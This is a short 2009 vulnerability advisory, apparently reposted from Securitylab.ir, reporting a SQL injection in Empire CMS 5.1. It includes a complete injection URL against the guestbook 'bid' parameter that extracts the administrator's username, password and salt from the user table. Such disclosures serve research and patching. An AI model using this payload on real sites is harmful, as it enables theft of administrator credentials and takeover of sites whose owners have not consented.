Empire Cms 5.1 sql injection Jun 30 2009 08:13PM
info securitylab ir
######################### Securitylab.ir ########################

# Application Info:

# Name: Empire Cms

# Version: 5.1

# Download: http://www.phome.net/OpenSource/download/EmpireCMS_5.1os_SC_GBK.zip

#################################################################

# Discoverd By: Securitylab.ir

# Website: http://Securitylab.ir

# Contacts: admin[at]securitylab.ir & k4mr4n_st (at) yahoo (dot) com [email concealed]

#################################################################

# Vulnerability Info:

# Type: Sql Injection

# Risk: Medium

#===========================================================

# http://site.com/e/tool/gbook/?bid=1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*

#===========================================================

# Securitylab Security Research Team

###################################################################

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus